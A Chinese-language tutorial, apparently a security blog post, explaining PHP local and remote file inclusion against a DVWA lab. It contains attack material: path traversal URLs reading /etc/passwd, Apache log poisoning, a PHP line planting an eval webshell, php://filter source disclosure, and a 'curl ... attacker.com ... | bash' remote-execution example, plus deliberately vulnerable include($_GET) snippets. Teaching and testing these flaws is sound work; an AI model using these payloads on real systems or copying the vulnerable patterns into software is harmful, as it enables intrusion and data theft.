目錄

說明

通常分為兩種類型：

本地文件包含

典型的攻擊方式1：

影響：

典型的攻擊方式2：

包含路徑解釋：

日志包含漏洞：

操作原理

包含漏洞讀取文件?

文件包含漏洞遠程代碼執(zhí)行漏洞:

遠程文件包含

典型的攻擊方式：

影響：

文件包含漏洞的根本原因

語言包含漏洞

PHP文件包含漏洞函數(shù)

文件包含漏洞相關的常見 PHP 函數(shù)

1. include() 和 require()

2. include_once() 和 require_once()

3. fopen() 和 fread()

4. file_get_contents()

5. readfile()

6. highlight_file()

7. fpassthru()

總結

防御措施

輸入驗證與過濾：

禁用遠程文件包含：

使用絕對路徑：

文件包含路徑限制：

日志記錄與監(jiān)控：

代碼審計與滲透測試：

總結

說明

文件包含漏洞（File Inclusion Vulnerability）是一種常見的Web安全漏洞，它允許攻擊者通過修改文件路徑，包含服務器上未經授權的文件，可能導致敏感信息泄露、代碼執(zhí)行或服務器被入侵。根據(jù)文件包含的行為

通常分為兩種類型：

• 本地文件包含（LFI）
• 遠程文件包含（RFI）

本地文件包含

• LFI 是指攻擊者能夠包含和執(zhí)行服務器本地文件系統(tǒng)中的文件

攻擊者通過修改程序中的文件路徑參數(shù)，訪問并讀取本地文件（如配置文件、日志文件、甚至敏感的系統(tǒng)文件），有時也能執(zhí)行惡意文件。

典型的攻擊方式1：

• 攻擊者通過修改 URL 參數(shù)來試圖包含本地文件
• 例如：

http://example.com/index.php?page=../../../../etc/passwd

• 在這個例子中

攻擊者試圖通過“../../../../etc/passwd”來訪問服務器上的 /etc/passwd 文件（Unix/Linux 系統(tǒng)中的一個存儲用戶賬戶信息的文件）。

影響：

• 信息泄露：攻擊者能夠查看服務器上的敏感文件（如配置文件、日志文件、密碼文件等）。
• 路徑遍歷攻擊：攻擊者可以通過構造特殊的路徑，訪問并查看不應公開的文件。
• 惡意文件執(zhí)行：如果不當配置或存在缺陷，攻擊者甚至可以包含可執(zhí)行文件進行代碼執(zhí)行。

典型的攻擊方式2：

• 用戶輸入控制： 應用程序允許用戶通過URL參數(shù)或其他輸入來指定文件路徑。例如：

<?php
include($_GET['page']);
?>

這種代碼會根據(jù)用戶傳入的page參數(shù)來包含文件。

包含路徑解釋：

1. 絕對路徑包含

2. 相對路徑包含

3. 文件穿越漏洞

4. 包含一些圖片嗎進行控制 包含敏感文件讀取出來

5. 遠程文件包包含，另外一個網站 得文件，其它網站得文件包含進來。

6. 直接引用別人得網站得圖片 前提是看別人開啟了相關參數(shù)沒。

日志包含漏洞：

• 日志包含漏洞是指攻擊者通過注入惡意內容到日志文件中，可能會破壞日志文件的完整性，或通過日志文件將惡意代碼執(zhí)行。
• 攻擊者可以偽造日志，或在日志中插入惡意的HTTP頭、SQL注入等攻擊代碼，進而進行進一步的攻擊。

操作原理

1. 當某個PHP文件存在本地包含漏洞，而卻無法上傳正常文件.

2. 這就意味著有包含漏洞卻不能拿來利用，這時攻擊者就有可能會利用apache日志文件來入侵.

   1. Apache服務器運行后會生成兩個日志文件，這兩個文件是access.log(訪問日志)和error.log(錯誤日志)。

   2. apache的日志文件記錄下我們的操作，并且寫到訪問日志文件access.log之中

   3. 前提開啟了日志記錄功能 apache 其實還是需要指紋收集收到日志目錄的位置

   4. 其實這種方式就是把木馬直接寫入到日志文件中.

   5. 在訪問網站得時候 加入木馬程序 也就是在訪問程序得時候加入一句話木馬相關程序 這樣就會寫入到程序中去了

   6. 蟻箭 冰蝎 連接程序 Winwos程序中都有一句話木馬程序 連接

   7. http://192.168.1.9/dvwa/vulnerabilities/fi/?page=../../../../Apache\logs\access.log 寫入后再訪問 就可以通過日志進行訪問

• 1瀏覽器日志 記錄可能會編譯成url編碼

• 2通過抓包 也就會變成正常得編碼記錄到日志 然后訪問日志目錄就可以進入文件包含漏洞進行入侵。

• 記錄下php得一句話木馬程序寫法
• 寫入一句話木馬 通過蟻箭連接不上 換個方式寫入php一句話木馬
• <?php $file=fopen('jaden.php','w');fputs($file,'<?php @eval($_POST[666]);?>');?>
• 數(shù)據(jù)存在于存在與執(zhí)行得目錄中 jaden.php
• 問題: 我們在實際操作得時候 如何確定日志是空 如何找到對應日志目錄 指紋收集

包含漏洞讀取文件?

讀取php文件 包含就能讀取:

• 采用得是file:///協(xié)議

• 讀取php文件不想執(zhí)行

• Php:/// 讀取文件 指定php協(xié)議來讀取協(xié)議

  • http://192.168.1.9/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=file4.php

  • 以base64得數(shù)據(jù)格式進行讀取出來

• 通過文件包含漏洞利用 file:// 偽協(xié)議讀取文件是一種常見的攻擊手段，特別是當Web應用程序允許通過用戶輸入指定文件路徑時。
• 攻擊者可以利用這種方式繞過某些安全控制，從而讀取本地文件（例如 /etc/passwd 或其他敏感文件），或者執(zhí)行路徑遍歷攻擊來獲取服務器上的敏感信息。
• file:///etc/passwd

文件包含漏洞遠程代碼執(zhí)行漏洞:

• 文件包含漏洞（File Inclusion Vulnerability）如果結合遠程文件包含（Remote File Inclusion, RFI）和不當?shù)呐渲没蚬粽卟倏氐妮斎?/em>
• 可能導致遠程代碼執(zhí)行漏洞（Remote Code Execution, RCE）
• 在這種情況下，攻擊者不僅能讀取文件，還能執(zhí)行惡意代碼，導致嚴重的安全問題。

<?php
system('curl -s http://attacker.com/malicious_script.sh | bash');
?>

http://example.com/index.php?page=http://evil.com/malicious_script.php

include($_GET['page']);
// 如果未進行過濾，攻擊者可以傳遞惡意的文件路徑，如 '../../etc/passwd'

$file = fopen($_GET['file'], "r");  // 如果未驗證，攻擊者可以操控路徑讀取文件

$content = file_get_contents($_GET['file']);

readfile($_GET['file']);

highlight_file($_GET['file']);

$file = fopen($_GET['file'], "r");
fpassthru($file);